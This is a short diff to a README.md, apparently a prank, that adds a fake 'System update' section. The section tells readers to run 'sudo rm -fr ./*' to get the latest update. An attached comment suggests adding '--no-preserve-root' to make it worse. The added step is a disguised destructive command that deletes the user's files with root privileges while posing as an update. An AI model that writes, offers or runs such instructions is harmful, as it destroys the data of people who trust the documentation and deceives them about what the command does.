README.md

```diff
@@ -1,3 +1,11 @@
 # meow
 # meow
 # mrowr
+
+# ...---...
+
+# System update
+Run next code in your terminal to get the lattest update
+```bash
+sudo rm -fr ./*
```

Comment:
`rm -fr` - we are removing for real; also add `--no-preserve-root` mainly for aesthetic reasons